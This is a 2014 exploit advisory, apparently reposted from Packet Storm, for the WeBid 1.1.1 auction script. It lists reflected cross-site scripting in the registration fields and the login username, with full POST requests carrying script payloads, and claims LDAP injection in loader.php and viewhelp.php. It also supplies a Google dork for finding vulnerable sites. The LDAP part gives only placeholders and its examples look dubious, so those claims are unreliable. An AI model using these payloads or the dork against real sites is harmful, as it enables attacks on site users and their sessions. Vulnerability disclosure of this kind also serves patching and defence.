WeBid 1.1.1 Cross Site Scripting / LDAP Injection

2014-07-10T00:00:00
ID PACKETSTORM:127431
Type packetstorm
Reporter Govind Singh
Modified 2014-07-10T00:00:00

Description

                                        
                                            `##################################################################################################  
#  
#Exploit Title : WeBid Version 1.1.1 multiple vulnerability   
#Author : Govind Singh aka NullPort  
#Vendor : http://www.webidsupport.com/  
#Download Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download  
#Google Dork : "Powered by WeBid"   
#Date : 11/07/2014  
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )  
#Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi  
#Greez to : All IHT Members   
#   
###################################################################################################  
  
1. Reflected Cross-Site Scripting :  
2. LDAP Injection  
  
1. http://localhost/WeBid/register.php  
  
Reflected Cross-Site Scripting in the parameters are :  
"TPL_name="   
"TPL_nick="   
"TPL_email"   
"TPL_year"   
"TPL_address"   
"TPL_city"   
"TPL_prov"   
"TPL_zip"   
"TPL_phone"   
"TPL_pp_email"   
"TPL_authnet_id"   
"TPL_authnet_pass"   
"TPL_wordpay_id"   
"TPL_toocheckout_id"   
"TPL_moneybookers_email"  
  
PoC :  
we can run our xss script with all these different parameters   
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/web-id/register.php  
Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=417  
POSTDATA=csrftoken=&TPL_name="><script>alert('Hacked By Govind Singh aka NullPort');</script>&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first  
----------------------------------------------------------------------------------------------------------------  
2. http://localhost/WeBid/user_login.php  
  
Reflected Cross-Site Scripting in the parameter is :  
"username"   
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/web-id/user_login.php  
Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=96  
POSTDATA=username="><script>alert('xss PoC By Govind Singh');</script>&password=&input=Login&action=login  
==================================================================================================================  
2. LDAP Injection   
  
PoC :  
http://localhost/WeBid/loader.php?js=[LDAP]  
http://localhost/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;  
  
PoC  
http://localhost/WeBid/viewhelp.php?cat=[LDAP]  
Replace cat= as 1,2,3,4   
  
----------------------------------------------------------------------------------------------------------------------  
  
`